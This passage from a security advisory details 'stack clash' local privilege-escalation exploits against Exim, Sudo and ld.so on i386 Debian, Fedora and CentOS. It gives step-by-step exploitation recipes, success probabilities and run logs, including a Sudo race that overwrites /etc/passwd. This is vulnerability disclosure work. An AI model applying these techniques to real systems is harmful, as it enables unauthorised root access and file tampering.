When the heap is blocked by the libraries, malloc() switches from brk() to mmap()s of 1MB (MMAP_AS_MORECORE_SIZE), and our memory leak reaches the stack with mmap()s instead of the heap. Such a stack-clash is also exploitable, but its probability of success is low, as detailed in IV.1.6., and we therefore discarded this approach.
- The heap must always reach the stack, when not blocked by libraries
Because the initial heap-stack distance (between the start of the heap and the end of the stack) is a random variable:
-
either we allocate the exact amount of heap memory to cover the mean heap-stack distance, but the probability of success of this approach is low and we therefore discarded it;
-
or we allocate enough heap memory to always reach the stack, even when the initial heap-stack distance is maximal; after the heap reaches the stack, our memory leak allocates mmap()s of 1MB above the stack (below 0xC0000000) and below the heap (above the libraries), but it must not exhaust the address-space (the 1GB below 0x40000000 is unmappable);
-
the final heap-stack distance (between the end of the heap and the start of the stack) is also a random variable:
. its minimum value is 8KB (the stack guard-page, plus a safety page imposed by the brk() system-call in mm/mmap.c);
. its maximum value is roughly the size of a memleak-chunk, plus 128KB (DEFAULT_TOP_PAD, malloc/malloc.c).
Step 3: Jump over the stack guard-page and into the heap
-
The stack-pointer must jump over the guard-page and land into the free chunk at the end of the heap (the remainder of the heap after malloc() switches from brk() to mmap()), where both the smashing-chunk and memcpy()'s stack-frame are allocated and overwritten in Step 4a [Condition 2];
-
The write (of approximately smashing-chunk bytes) to string_sprintf()'s stack-based buffer (which starts where the guard-page jump lands) must not crash into the end of the heap [Condition 3].
Step 4a: Smash the stack with the heap
The smashing-chunk must be allocated into the free chunk at the end of the heap:
-
the smashing-chunk must not be allocated into the free chunks left over at the end of the 1MB mmap()s [Condition 4];
-
the memleak-chunks must not be allocated into the free chunk at the end of the heap [Condition 5].
Intuitively, the probability of gaining control of eip depends on the size of the smashing-chunk (the guard-page jump's landing-zone) and the size of the memleak-chunks (which determines the final heap-stack distance).
To maximize this probability, we wrote a helper program that imposes the following conditions on the smashing-chunk and memleak-chunks:
-
the smashing-chunk must be smaller than 32KB (STRING_SPRINTF_BUFFER_SIZE) [Condition 3];
-
the memleak-chunks must be smaller than 128KB (DEFAULT_MMAP_THRESHOLD, malloc/malloc.c);
-
the free chunk at the end of the heap must be larger than twice the smashing-chunk size [Conditions 2 and 3];
-
the free chunk at the end of the heap must be smaller than the memleak-chunk size [Condition 5];
-
when the final heap-stack distance is minimal, the 32KB (STRING_SPRINTF_BUFFER_SIZE) guard-page jump must land below the free chunk at the end of the heap [Condition 2];
-
the free chunks at the end of the 1MB mmap()s must be:
. either smaller than the smashing-chunk [Condition 4];
. or larger than the free chunk at the end of the heap (glibc's malloc() is a best-fit allocator) [Condition 4].
The resulting smashing-chunk and memleak-chunk sizes are:
smash: 10224 memleak: 27656 brk_min: 20464 brk_max: 24552 mmap_top: 25304 probability: 1/16 (0.06190487817)
In theory, the probability of gaining control of eip is 1/21: the product of the 1/16 probability calculated by this helper program (approximately (smashing-chunk / (memleak-chunk + DEFAULT_TOP_PAD))) and the 3/4 probability of reaching the stack with the heap [Condition 1].
In practice, on Debian 8.5, our final Exim exploit:
-
gains eip control in 1 run out of 28, on average;
-
takes 2.5 seconds per run (on a 4GB Virtual Machine);
-
has a good chance of obtaining a root-shell after 28*2.5 = 70 seconds;
-
uses 4GB of memory (2GB in the Exim process, and 2GB in the process fork()ed by system()).
Debian 8.6
Unlike Debian 8.5, Debian 8.6 is not vulnerable to CVE-2016-3672: after gaining eip control in Step 4a (Smash), the probability of successfully returning-into-libc's system() function is 1/256 (8 bits of entropy -- libraries are randomized in a 1MB range but aligned on 4KB).
Consequently, our final Exim exploit has a good chance of obtaining a root-shell on Debian 8.6 after 256282.5 seconds = 5 hours (256*28=7168 runs).
As we were drafting this advisory, we tried an alternative approach against Exim on Debian 8.6: we discovered that its stack is executable, because it depends on libgnutls-deb0, which depends on libp11-kit, which depends on libffi, which incorrectly requires an executable GNU_STACK (CVE-2017-1000376).
Initially, we discarded this approach because our 1GB of -p argument strings on the stack is not executable (_dl_make_stack_executable() only mprotect()s the stack below argv[] and envp[]):
41e00000-723d7000 rw-p 00000000 00:00 0 [heap] 802f1000-80334000 rwxp 00000000 00:00 0 [stack] 80334000-bfce6000 rw-p 00000000 00:00 0
and because the stack is randomized in an 8MB range but we do not control the contents of any large buffer on the executable stack.
Later, we discovered that two 128KB (MAX_ARG_STRLEN) copies of the LD_PRELOAD environment variable can be allocated onto the executable stack by ld.so's dl_main() and open_path() functions, automatically freed upon return from these functions, and re-allocated (but not overwritten) by Exim's 256KB stack-based group_list[].
In theory, the probability of returning into our shell-code (into these executable copies of LD_PRELOAD) is 1/32 (2128KB/8MB), higher than the 1/256 probability of returning-into-libc. In practice, this alternative Exim exploit has a good chance of obtaining a root-shell after 1174 runs -- instead of 3228=896 runs in theory, because the two 128KB copies of LD_PRELOAD are never perfectly aligned with Exim's 256KB group_list[] -- or 1174*2.5 seconds = 50 minutes.
Debian 9 and 10
Unlike Debian 8, Debian 9 and 10 are not vulnerable to offset2lib, a minor weakness in Linux's ASLR that coincidentally affects Step 1 (Clash) of our stack-clash exploits:
https://cybersecurity.upv.es/attacks/offset2lib/offset2lib.html https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d1fd836dcf00d2028c700c7e44d2c23404062c90
If we set RLIMIT_STACK to RLIM_INFINITY, the kernel still switches to the legacy bottom-up mmap() layout, and the libraries are randomized in the 1MB range above the address 0x40000000, but Exim's PIE is randomized in the 1MB range above the address 0x80000000 and the heap is randomized in the 32MB range above the PIE's .bss section. As a result:
-
the heap is always able to reach the stack, because its growth is never blocked by the libraries -- the theoretical probability of gaining eip control is 1/16, the probability calculated by our helper program;
-
the heap clashes with the stack around the address 0xA0000000, because the initial heap-stack distance is 1GB (0xC0000000-0x80000000) and can be covered with 512MB of heap memory and 512MB of stack memory.
Remote exploitation
Exim's string_sprintf() or glibc's vfprintf() can be used to remotely complete Steps 3 and 4 of the stack-clash; and the 256KB group_list[] in Exim's main() naturally consumes the 128KB of initial stack expansion in Step 2; but another 256KB group_list[] in Exim's exim_setugid() further decreases the start address of the stack and prevents us from remotely completing Step 2 and exploiting Exim.
======================================================================== IV.1.2. Sudo ========================================================================
Introduction
We discovered a vulnerability in Sudo's get_process_ttyname() for Linux: this function opens "/proc/[pid]/stat" (man proc) and reads the device number of the tty from field 7 (tty_nr). Unfortunately, these fields are space-separated and field 2 (comm, the filename of the command) can contain spaces (CVE-2017-1000367).
For example, if we execute Sudo through the symlink "./ 1 ", get_process_ttyname() calls sudo_ttyname_dev() to search for the non-existent tty device number "1" in the built-in search_devs[].
Next, sudo_ttyname_dev() calls the recursive function sudo_ttyname_scan() to search for this non-existent tty device number "1" in a breadth-first traversal of "/dev".
Last, we exploit this recursive function during its traversal of the world-writable "/dev/shm", and allocate hundreds of megabytes of heap memory from the filesystem (directory pathnames) instead of the stack (the command-line arguments and environment variables allocated by our other stack-clash exploits).
Step 1: Clash the stack with the heap
sudo_ttyname_scan() strdup()licates the pathnames of the directories and sub-directories that it traverses, but does not free() them until it returns. Each one of these "memleak-chunks" allocates at most 4KB (PATH_MAX) of heap memory.
Step 2: Move the stack-pointer to the start of the stack
The recursive calls to sudo_ttyname_scan() allocate 4KB (PATH_MAX) stack-frames that naturally consume the 128KB of initial stack expansion.
Step 3: Jump over the stack guard-page and into the heap
If the length of a directory pathname reaches 4KB (PATH_MAX), sudo_ttyname_scan() calls warning(), which calls strerror() and _(), which call gettext() and allow us to jump over the stack guard-page with an alloca() of up to 128KB (the LANGUAGE environment variable), as explained in II.3.3.
Step 4a: Smash the stack with the heap
The self-contained gettext() exploitation method malloc()ates and memcpy()es a "smashing-chunk" of up to 128KB (the OUTPUT_CHARSET environment variable) that smashes memcpy()'s stack-frame and return-address, as explained in II.3.4.
Debian 8.5
Step 1: Clash the stack with the heap
Debian 8.5 is vulnerable to CVE-2016-3672: if we set RLIMIT_STACK to RLIM_INFINITY, the kernel switches to the legacy bottom-up mmap() layout and disables the ASLR of Sudo's PIE and libraries, but still the initial heap-stack distance is randomized and roughly 2GB (0xC0000000-0x40000000 -- the start of the heap is randomized in a 32MB range above 0x40000000, and the end of the stack is randomized in the 8MB range below 0xC0000000).
To reach the start of the stack with the end of the heap, we allocate hundreds of megabytes of heap memory from the filesystem (directory pathnames), and:
-
the heap must be able to reach the stack -- on Debian 8.5, Sudo's libraries occupy about 3MB and hence block the growth of the heap with a probability of 3MB/32MB ~= 1/11;
-
when not blocked by the libraries, the heap must always reach the stack, even when the initial heap-stack distance is maximal (as detailed in IV.1.1.);
-
we cover half of the initial heap-stack distance with 1GB of heap memory (the memleak-chunks, strdup()licated directory pathnames);
-
we cover the other half of this distance with 1GB of stack memory (the maximum permitted by the kernel's 1/4 limit on the argument and environment strings) and thus reduce our on-disk inode usage;
-
we redirect sudo_ttyname_scan()'s traversal of /dev to /var/tmp (through a symlink planted in /dev/shm) to work around the small number of inodes available in /dev/shm.
After the heap reaches the stack and malloc() switches from brk() to mmap()s of 1MB:
-
the size of the free chunk left over at the end of the heap is a random variable in the [0B,4KB] range -- 4KB (PATH_MAX) is the approximate size of a memleak-chunk;
-
the final heap-stack distance (between the end of the heap and the start of the stack) is a random variable in the [8KB,4KB+128KB=132KB] range -- the size of a memleak-chunk plus 128KB (DEFAULT_TOP_PAD);
-
sudo_ttyname_scan() recurses a few more times and therefore allocates more stack memory, but this stack expansion is blocked by the heap and crashes into the stack guard-page after 16 recursions on average (132KB/4KB/2, where 132KB is the maximum final heap-stack distance, and 4KB is the size of sudo_ttyname_scan()'s stack-frame).
To solve this unexpected problem, we:
-
first, redirect sudo_ttyname_scan() to a directory tree "A" in /var/tmp that recurses and allocates stack memory, but does not allocate heap memory (each directory level contains only one entry, the sub-directory that is connected to the next directory level);
-
second, redirect sudo_ttyname_scan() to a directory tree "B" in /var/tmp that recurses and allocates heap memory (each directory level contains many entries), but does not allocate more stack memory (it simply consumes the stack memory that was already allocated by the directory tree "A"): it does not further expand the stack, and does not crash into the guard-page.
Finally, we increase the speed of our exploit and avoid thousands of useless recursions:
-
in each directory level traversed by sudo_ttyname_scan(), we randomly modify the names of its sub-directories until the first call to readdir() returns the only sub-directory that is connected to the next level of the directory tree (all other sub-directories allocate heap memory but are otherwise empty);
-
we dup2() Sudo's stdout and stderr to a pipe with no readers that terminates Sudo with a SIGPIPE if sudo_ttyname_scan() calls warning() and sudo_printf() (a failed exploit attempt, usually because the final heap-stack distance is much longer or shorter than the guard-page jump).
Step 2: Move the stack-pointer to the start of the stack
sudo_ttyname_scan() allocates a 4KB (PATH_MAX) stack-based pathbuf[] that naturally consumes the 128KB of initial stack expansion in fewer than 128KB/4KB=32 recursive calls.
The recursive calls to sudo_ttyname_scan() allocate less than 8MB of stack memory: the maximum number of recursions (PATH_MAX / strlen("/a") = 2K) multiplied by the size of sudo_ttyname_scan()'s stack-frame (4KB).
Step 3: Jump over the stack guard-page and into the heap
The length of the guard-page jump in gettext() is the length of the LANGUAGE environment variable (at most 128KB, MAX_ARG_STRLEN): we take a 64KB jump, well within the range of the final heap-stack distance; this jump then lands into the free chunk at the end of the heap, where the smashing-chunk will be allocated in Step 4a, with a probability of (smashing-chunk / (memleak-chunk + DEFAULT_TOP_PAD)).
If available, we assign "C.UTF-8" to the LC_ALL environment variable, and prepend "be" to our 64KB LANGUAGE environment variable, because these minimal locales do not interfere with our heap feng-shui.
Step 4a: Smash the stack with the heap
In gettext(), the smashing-chunk (a malloc() and memcpy() of the OUTPUT_CHARSET environment variable) must be allocated into the free chunk at the end of the heap, where the stack-frame of memcpy() is also allocated.
First, if the size of our memleak-chunks is exactly 4KB+8B (PATH_MAX+MALLOC_ALIGNMENT), then:
-
the size of the free chunk at the end of the heap is a random variable in the [0B,4KB] range;
-
the size of the free chunks left over at the end of the 1MB mmap()s is roughly 1MB%(4KB+8B)=2KB.
Second, if the size of our smashing-chunk is about 2KB+256B (PATH_MAX/2+NAME_MAX), then:
-
it is always larger than (and never allocated into) the free chunks at the end of the 1MB mmap()s;
-
it is smaller than (and allocated into) the free chunk at the end of the heap with a probability of roughly 1-(2KB+256B)/4KB.
Last, in each level of our directory tree "B", sudo_ttyname_scan() malloc()ates and realloc()ates an array of pointers to sub-directories, but these realloc()s prevent the smashing-chunk from being allocated into the free chunk at the end of the heap:
-
they create holes in the heap, where the smashing-chunk may be allocated to;
-
they may allocate the free chunk at the end of the heap, where the smashing-chunk should be allocated to.
To solve these problems, we carefully calculate the number of sub-directories in each level of our directory tree "B":
- we limit the size of the realloc()s -- and hence the size of the holes that they create -- to 4KB+2KB:
. either a memleak-chunk is allocated into such a hole, and the remainder is smaller than the smashing-chunk ("not a fit");
. or such a hole is not allocated, but it is larger than the largest free chunk at the end of the heap ("a worse fit");
- we gradually reduce the final size of the realloc()s in the last levels of our directory tree "B", and hence re-allocate the holes created in the previous levels.
In theory, on Debian 8.5, the probability of gaining control of eip is approximately 1/148, the product of:
-
(Step 1) the probability of reaching the stack with the heap: 1-3MB/32MB;
-
(Step 3) the probability of jumping over the stack guard-page and into the free chunk at the end of the heap: (2KB+256B) / (4KB+8B + 128KB);
-
(Step 4a) the probability of allocating the smashing-chunk into the free chunk at the end of the heap: 1-(2KB+256B)/4KB.
In practice, on Debian 8.5, this Sudo exploit:
-
gains eip control in 1 run out of 200, on average;
-
takes 2.8 seconds per run (on a 4GB Virtual Machine);
-
has a good chance of obtaining a root-shell after 200 * 2.8 seconds = 9 minutes;
-
uses 2GB of memory.
Note: we do not return-into-libc's system() in Step 4a because /bin/sh may be bash, which drops our escalated root privileges upon execution. Instead, we:
-
either return-into-libc's __gconv_find_shlib() function through find_module(), which loads this function's argument from -0x20(%ebp);
-
or return-into-libc's __libc_dlopen_mode() function through nss_load_library(), which loads this function's argument from -0x1c(%ebp);
-
search the libc for a relative pathname that contains a slash character (for example, "./fork.c") and pass its address to __gconv_find_shlib() or __libc_dlopen_mode();
-
symlink() our PIE exploit to this pathname, and let Sudo execute our _init() constructor as root, upon successful exploitation.
Debian 8.6
Unlike Debian 8.5, Debian 8.6 is not vulnerable to CVE-2016-3672: Sudo's PIE and libraries are always randomized, even if we set RLIMIT_STACK to RLIM_INFINITY; the probability of successfully returning-into-libc, after gaining eip control in Step 4a (Smash), is 1/256.
However, Debian 8.6 is still vulnerable to offset2lib, the minor weakness in Linux's ASLR that coincidentally affects Step 1 (Clash) of our stack-clash exploits:
-
if we set RLIMIT_STACK to 136MB (MIN_GAP) or less (the default is 8MB), then the initial heap-stack distance (between the start of the heap and the end of the stack) is minimal, a random variable in the [96MB,137MB] range;
-
instead of allocating 1GB of heap memory and 1GB of stack memory to clash the stack with the heap, we merely allocate 137MB of heap memory (directory pathnames from our directory tree "B") and no stack memory.
In theory, on Debian 8.6, the probability of gaining eip control is 1/134 (instead of 1/148 on Debian 8.5) because the growth of the heap is never blocked by Sudo's libraries; and in practice, this Sudo exploit takes only 0.15 second per run (instead of 2.8 on Debian 8.5).
Independent exploitation
The vulnerability that we discovered in Sudo's get_process_ttyname() function for Linux (CVE-2017-1000367) is exploitable independently of its stack-clash repercussions: through this vulnerability, a local user can pretend that his tty is any character device on the filesystem, and after two race conditions, he can pretend that his tty is any file on the filesystem.
On an SELinux-enabled system, if a user is Sudoer for a command that does not grant him full root privileges, he can overwrite any file on the filesystem (including root-owned files) with this command's output, because relabel_tty() (in src/selinux.c) calls open(O_RDWR|O_NONBLOCK) on his tty and dup2()s it to the command's stdin, stdout, and stderr.
To exploit this vulnerability, we:
-
create a directory "/dev/shm/_tmp" (to work around /proc/sys/fs/protected_symlinks), and a symlink "/dev/shm/_tmp/_tty" to a non-existent pty "/dev/pts/57", whose device number is 34873;
-
run Sudo through a symlink "/dev/shm/_tmp/ 34873 " that spoofs the device number of this non-existent pty;
-
set the flag CD_RBAC_ENABLED through the command-line option "-r role" (where "role" can be our current role, for example "unconfined_r");
-
monitor our directory "/dev/shm/_tmp" (for an IN_OPEN inotify event) and wait until Sudo opendir()s it (because sudo_ttyname_dev() cannot find our non-existent pty in "/dev/pts/");
-
SIGSTOP Sudo, call openpty() until it creates our non-existent pty, and SIGCONT Sudo;
-
monitor our directory "/dev/shm/_tmp" (for an IN_CLOSE_NOWRITE inotify event) and wait until Sudo closedir()s it;
-
SIGSTOP Sudo, replace the symlink "/dev/shm/_tmp/_tty" to our now-existent pty with a symlink to the file that we want to overwrite (for example "/etc/passwd"), and SIGCONT Sudo;
-
control the output of the command executed by Sudo (the output that overwrites "/etc/passwd"):
. either through a command-specific method;
. or through a general method such as "--\nHELLO\nWORLD\n" (by default, getopt() prints an error message to stderr if it does not recognize an option character).
To reliably win the two SIGSTOP races, we preempt the Sudo process: we setpriority() it to the lowest priority, sched_setscheduler() it to SCHED_IDLE, and sched_setaffinity() it to the same CPU as our exploit.
[john@localhost ~]$ head -n 8 /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt
[john@localhost ~]$ sudo -l [sudo] password for john: ... User john may run the following commands on localhost: (ALL) /usr/bin/sum
[john@localhost ~]$ ./Linux_sudo_CVE-2017-1000367 /usr/bin/sum $'--\nHELLO\nWORLD\n' [sudo] password for john:
[john@localhost ~]$ head -n 8 /etc/passwd /usr/bin/sum: unrecognized option '-- HELLO WORLD ' Try '/usr/bin/sum --help' for more information. ogin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
======================================================================== IV.1.3. ld.so "hwcap" exploit ========================================================================
"ld.so and ld-linux.so* find and load the shared libraries needed by a program, prepare the program to run, and then run it." (man ld.so)
Through ld.so, most SUID and SGID binaries on most i386 Linux distributions are exploitable. For example: Debian 7, 8, 9, 10; Fedora 23, 24, 25; CentOS 5, 6, 7.
Debian 8.5
Step 1: Clash the stack with anonymous mmap()s
The minimal malloc() implementation in ld.so calls mmap(), not brk(), to obtain memory from the system, and it never calls munmap(). To reach the start of the stack with anonymous mmap()s, we:
-
set RLIMIT_STACK to RLIM_INFINITY and switch from the default top-down mmap() layout to the legacy bottom-up mmap() layout;
-
cover half of the initial mmap-stack distance (0xC0000000-0x40000000=2GB) with 1GB of stack memory (the maximum permitted by the kernel's 1/4 limit on the argument and environment strings);
-
cover the other half of this distance with 1GB of anonymous mmap()s, through multiple LD_AUDIT environment variables that permanently leak millions of audit_list structures (CVE-2017-1000366) in process_envvars() and process_dl_audit() (elf/rtld.c).
Step 2: Move the stack-pointer to the start of the stack
To consume the 128KB of initial stack expansion, we simply pass 128KB of argv[] and envp[] pointers to execve(), as explained in II.3.2.
Step 3: Jump over the stack guard-page and into the anonymous mmap()s
_dl_init_paths() (elf/dl-load.c), which is called by dl_main() after process_envvars(), alloca()tes llp_tmp, a stack-based buffer large enough to hold the LD_LIBRARY_PATH environment variable and any combination of Dynamic String Token (DST) replacement strings. To calculate the size of llp_tmp, _dl_init_paths() must:
-
first, scan LD_LIBRARY_PATH and count all DSTs ($LIB, $PLATFORM, and $ORIGIN);
-
second, multiply the number of DSTs by the length of the longest DST replacement string (on Debian, $LIB is replaced by the 18-char-long "lib/i386-linux-gnu", $PLATFORM by "i386" or "i686", and $ORIGIN by the pathname of the program's directory, for example "/bin" or "/usr/sbin" -- the longest DST replacement string is usually "lib/i386-linux-gnu");
-
last, add the length of the original LD_LIBRARY_PATH.
Consequently, if LD_LIBRARY_PATH contains many DSTs that are replaced by the shortest DST replacement string, then llp_tmp is large but not fully written to, and can be used to jump over the stack guard-page and into the anonymous mmap()s.
Our ld.so exploits do not use $ORIGIN because it is ignored by several distributions and glibc versions; for example:
2010-12-09 Andreas Schwab schwab@redhat.com
* elf/dl-object.c (_dl_new_object): Ignore origin of privileged
program.
Index: glibc-2.12-2-gc4ccff1/elf/dl-object.c
--- glibc-2.12-2-gc4ccff1.orig/elf/dl-object.c +++ glibc-2.12-2-gc4ccff1/elf/dl-object.c @@ -214,6 +214,9 @@ _dl_new_object (char realname, const ch out: new->l_origin = origin; } + else if (INTUSE(__libc_enable_secure) && type == lt_executable) + / The origin of a privileged program cannot be trusted. / + new->l_origin = (char ) -1;
return new; }
Step 4b: Smash an anonymous mmap() with the stack
Before _dl_init_paths() returns to dl_main() and jumps back from the anonymous mmap()s into the stack, we overwrite the block of mmap()ed memory malloc()ated by _dl_important_hwcaps() with the contents of the stack-based buffer llp_tmp.
- The block of memory malloc()ated by _dl_important_hwcaps() is divided in two:
. The first part (the "hwcap-pointers") is an array of r_strlenpair structures that point to the hardware-capability strings stored in the second part of this memory block. The second part (the "hwcap-strings") contains strings of hardware-capabilities that are appended to the pathnames of trusted directories, such as "/lib/" and "/lib/i386-linux-gnu/", when open_path() searches for audit libraries (LD_AUDIT), preload libraries (LD_PRELOAD), or dependent libraries (DT_NEEDED).
For example, on Debian, when open_path() finds "libc.so.6" in
"/lib/i386-linux-gnu/i686/cmov/", "i686/cmov/" is such a
hardware-capability string.
- To overwrite the block of memory malloc()ated by _dl_important_hwcaps() with the contents of the stack-based buffer llp_tmp, we divide our LD_LIBRARY_PATH environment variable in two:
. The first, static part (our "good-write") overwrites the first hardware-capability string with characters that we do control. The second, dynamic part (our "bad-write") overwrites the last hardware-capability strings with characters that we do not control (the short DST replacement strings that enlarge llp_tmp and allow us to jump over the stack guard-page).
If our 16-byte-aligned good-write overwrites the 8-byte-aligned first hardware-capability string with the 8-byte pattern "/../tmp/", and if we append the trusted directory "/lib" to our LD_LIBRARY_PATH, then (after _dl_init_paths() returns to dl_main()):
-
dlmopen_doit() tries to load an LD_AUDIT library "a" (our memory leak from Step 1);
-
_dl_map_object() searches for "a" in the trusted directory "/lib" from our LD_LIBRARY_PATH;
-
open_path() finds our library "a" in "/lib//../tmp//../tmp//../tmp/" because we overwrote the first hardware-capability string with the pattern "/../tmp/";
-
dl_open_worker() executes our library's _init() constructor, as root.
In theory, this exploit's probability of success depends on:
- (event A) the size of rtld_search_dirs.dirs[0], an array of r_search_path_elem structures that are malloc()ated by _dl_init_paths() after the _dl_important_hwcaps(), and must be allocated above the stack (below 0xC0000000), not below the stack where it would interfere with Steps 3 (Jump) and 4b (Smash):
P(A) = 1 - size of rtld_search_dirs.dirs[0] / max stack randomization
- (event B) the size of the hwcap-pointers and the size of our good-write, which must overwrite the first hardware-capability string, but not the first hardware-capability pointer (to this string):
P(B|A) = MIN(size of hwcap-pointers, size of good-write) / (max stack randomization - size of rtld_search_dirs.dirs[0])
- (event C) the size of the hwcap-strings and the size of our bad-write, which must not write past the end of hwcap-strings; but we guarantee that size of hwcap-strings >= size of good-write + size of bad-write:
P(C|B) = 1
In practice, we use the LD_HWCAP_MASK environment variable to maximize this exploit's probability of success, because:
-
the size of the hwcap-pointers -- which act as a cushion that absorbs the excess of good-write without crashing,
-
the size of the hwcap-strings -- which act as a cushion that absorbs the excess of good-write and bad-write without crashing,
-
and the size of rtld_search_dirs.dirs[0],
are all proportional to 2^N, where N is the number of supported hardware-capabilities that we enable in LD_HWCAP_MASK.
For example, on Debian 8.5, this exploit:
-
has a 1/151 probability of success;
-
takes 5.5 seconds per run (on a 4GB Virtual Machine);
-
has a good chance of obtaining a root-shell after 151 * 5.5 seconds = 14 minutes.
Debian 8.6
Unlike Debian 8.5, Debian 8.6 is not vulnerable to CVE-2016-3672, but our ld.so "hwcap" exploit is a data-only attack and is not affected by the ASLR of the libraries and PIEs.
Debian 9 and 10
Unlike Debian 8, Debian 9 and 10 are not vulnerable to offset2lib: if we set RLIMIT_STACK to RLIM_INFINITY, the libraries are randomized above the address 0x40000000, but the PIE is randomized above 0x80000000 (instead of 0x40000000 before the offset2lib patch).
Unfortunately, we discovered a vulnerability in the offset2lib patch (CVE-2017-1000370): if the PIE is execve()d with 1GB of argument or environment strings (the maximum permitted by the kernel's 1/4 limit) then the stack occupies the address 0x80000000, and the PIE is mapped above the address 0x40000000 instead, directly below the libraries. This vulnerability effectively nullifies the offset2lib patch, and allows us to reuse our Debian 8 exploit against Debian 9 and 10.
$ ./Linux_offset2lib Run #1... CVE-2017-1000370 triggered 40076000-40078000 r-xp 00000000 00:26 25041 /tmp/Linux_offset2lib 40078000-40079000 r--p 00001000 00:26 25041 /tmp/Linux_offset2lib 40079000-4009b000 rw-p 00002000 00:26 25041 /tmp/Linux_offset2lib 4009b000-400c0000 r-xp 00000000 fd:00 8463588 /usr/lib/ld-2.24.so 400c0000-400c1000 r--p 00024000 fd:00 8463588 /usr/lib/ld-2.24.so 400c1000-400c2000 rw-p 00025000 fd:00 8463588 /usr/lib/ld-2.24.so 400c2000-400c4000 r--p 00000000 00:00 0 [vvar] 400c4000-400c6000 r-xp 00000000 00:00 0 [vdso] 400c6000-400c8000 rw-p 00000000 00:00 0 400cf000-402a3000 r-xp 00000000 fd:00 8463595 /usr/lib/libc-2.24.so 402a3000-402a4000 ---p 001d4000 fd:00 8463595 /usr/lib/libc-2.24.so 402a4000-402a6000 r--p 001d4000 fd:00 8463595 /usr/lib/libc-2.24.so 402a6000-402a7000 rw-p 001d6000 fd:00 8463595 /usr/lib/libc-2.24.so 402a7000-402aa000 rw-p 00000000 00:00 0 7fcf1000-bfcf2000 rw-p 00000000 00:00 0 [stack]
Caveats
- On Fedora and CentOS, this ld.so "hwcap" exploit fails against /usr/bin/passwd and /usr/bin/chage (but it works against all other SUID-root binaries) because of SELinux:
type=AVC msg=audit(1492091008.983:414): avc: denied { execute } for pid=2169 comm="passwd" path="/var/tmp/a" dev="dm-0" ino=12828063 scontext=unconfined_u:unconfined_r:passwd_t:s0-s0:c0.c1023 tcontext=unconfined_u:object_r:user_tmp_t:s0 tclass=file permissive=0
type=AVC msg=audit(1492092997.581:487): avc: denied { execute } for pid=2648 comm="chage" path="/var/tmp/a" dev="dm-0" ino=12828063 scontext=unconfined_u:unconfined_r:passwd_t:s0-s0:c0.c1023 tcontext=unconfined_u:object_r:user_tmp_t:s0 tclass=file permissive=0
- It fails against recent versions of Sudo that specify an RPATH such as "/usr/lib/sudo": _dl_map_object() first searches for our LD_AUDIT library in RPATH, but open_path() fails to find our library in "/usr/lib/sudo//../tmp/" and crashes as soon as it reaches an overwritten hwcap-pointer.
This problem can be solved by a 16-byte pattern "///../../../tmp/" (instead of the 8-byte pattern "/../tmp/") but the exploit's probability of success would be divided by two.
- On Ubuntu, this ld.so "hwcap" exploit always fails, because of the following patch:
Description: pro-actively disable LD_AUDIT for setuid binaries, regardless of where the libraries are loaded from. This is to try to make sure that CVE-2010-3856 cannot sneak back in. Upstream is unlikely to take this, since it limits the functionality of LD_AUDIT. Author: Kees Cook kees@ubuntu.com
Index: eglibc-2.15/elf/rtld.c
--- eglibc-2.15.orig/elf/rtld.c 2012-05-09 10:05:29.456899131 -0700 +++ eglibc-2.15/elf/rtld.c 2012-05-09 10:38:53.952009069 -0700 @@ -2529,7 +2529,7 @@ while ((p = (strsep) (&str, ":")) != NULL) if (p[0] != '\0' && (__builtin_expect (! __libc_enable_secure, 1) - || strchr (p, '/') == NULL)) + )) { / This is using the local malloc, not the system malloc. The memory can never be freed. /
======================================================================== IV.1.4. ld.so ".dynamic" exploit ========================================================================
To exploit ld.so without the LD_AUDIT memory leak, we rely on a second vulnerability that we discovered in the offset2lib patch (CVE-2017-1000371):
if we set RLIMIT_STACK to RLIM_INFINITY, and allocate nearly 1GB of stack memory (the maximum permitted by the kernel's 1/4 limit on the argument and environment strings) then the stack grows down to almost 0x80000000, and because the PIE is mapped above 0x80000000, the minimum distance between the end of the PIE's read-write segment and the start of the stack is 4KB (the stack guard-page).
$ ./Linux_offset2lib 0x3f800000 Run #1... Run #2... Run #3... Run #796... Run #797... Run #798... CVE-2017-1000371 triggered 4007b000-400a0000 r-xp 00000000 fd:00 8463588 /usr/lib/ld-2.24.so 400a0000-400a1000 r--p 00024000 fd:00 8463588 /usr/lib/ld-2.24.so 400a1000-400a2000 rw-p 00025000 fd:00 8463588 /usr/lib/ld-2.24.so 400a2000-400a4000 r--p 00000000 00:00 0 [vvar] 400a4000-400a6000 r-xp 00000000 00:00 0 [vdso] 400a6000-400a8000 rw-p 00000000 00:00 0 400af000-40283000 r-xp 00000000 fd:00 8463595 /usr/lib/libc-2.24.so 40283000-40284000 ---p 001d4000 fd:00 8463595 /usr/lib/libc-2.24.so 40284000-40286000 r--p 001d4000 fd:00 8463595 /usr/lib/libc-2.24.so 40286000-40287000 rw-p 001d6000 fd:00 8463595 /usr/lib/libc-2.24.so 40287000-4028a000 rw-p 00000000 00:00 0 8000a000-8000c000 r-xp 00000000 00:26 25041 /tmp/Linux_offset2lib 8000c000-8000d000 r--p 00001000 00:26 25041 /tmp/Linux_offset2lib 8000d000-8002f000 rw-p 00002000 00:26 25041 /tmp/Linux_offset2lib 80030000-bf831000 rw-p 00000000 00:00 0 [heap]
Note: in this example, the "[stack]" is incorrectly displayed as the "[heap]" by show_map_vma() (in fs/proc/task_mmu.c).
This completes Step 1: we clash the stack with the PIE's read-write segment; we complete the remaining steps as in the "hwcap" exploit:
-
Step 2: we consume the initial stack expansion with 128KB of argv[] and envp[] pointers;
-
Step 3: we jump over the stack guard-page and into the PIE's read-write segment with llp_tmp's alloca() (in _dl_init_paths());
-
Step 4b: we smash the PIE's read-write segment with llp_tmp's good-write and bad-write (in _dl_init_paths()); we can smash the following sections:
-
.data and .bss: but we discarded this application-specific approach;
-
